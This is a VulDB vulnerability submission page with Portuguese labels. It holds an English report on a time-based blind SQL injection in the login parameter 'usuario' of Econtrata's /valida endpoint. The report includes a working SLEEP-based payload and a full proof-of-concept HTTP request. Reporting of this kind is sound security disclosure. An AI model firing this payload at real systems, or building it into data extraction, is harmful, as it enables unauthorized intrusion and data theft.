| Título | Econtrata NA SQL Injection |
|---|
| Descrição | Vulnerability Report: Time-Based Blind SQL Injection in usuario Parameter
Summary
A Time-Based Blind SQL Injection vulnerability exists in the usuario parameter of the login endpoint:
POST /valida
Host: example.com
This vulnerability allows an attacker to manipulate backend SQL queries and confirm injection points by measuring response time delays, even when no errors or data are returned to the client.
Affected Endpoint
POST /valida HTTP/2
Host: example.com
Content-Type: application/x-www-form-urlencoded
Parameters:
usuario (vulnerable)
senha (not tested)
Proof of Concept (PoC)
Malicious Payload:
[email protected]' AND (SELECT 2277 FROM (SELECT(SLEEP(5)))KWDG)
URL-encoded Payload:
usuario=teste%40teste.com%27%20AND%20(SELECT%202277%20FROM%20(SELECT(SLEEP(5)))KWDG)
Example Full Request:
POST /valida HTTP/2
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=32f7830c766c2891423d5f48a9e7bae6
[email protected]' AND (SELECT 2277 FROM (SELECT(SLEEP(5)))KWDG)&senha=
Expected Behavior:
Normal login attempts should complete quickly.
This malicious input introduces a 5-second delay before the server responds.
⏱️ Observed Behavior:
The server responds after approximately 5 seconds.
This confirms that the SQL payload was successfully executed and evaluated.
Impact
Authenticated bypass (in time-based scenarios)
Proof of arbitrary SQL execution
Enumerate data character-by-character using time delay
|
|---|
| Fonte | ⚠️ https://github.com/yago3008/cves |
|---|
| Utilizador | y4g0 (UID 80480) |
|---|
| Submissão | 16/05/2025 17h03 (há 11 meses) |
|---|
| Moderação | 25/05/2025 15h31 (9 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 310260 [Econtrata até 20250516 /valida usuario Injeção SQL] |
|---|
| Pontos | 20 |
|---|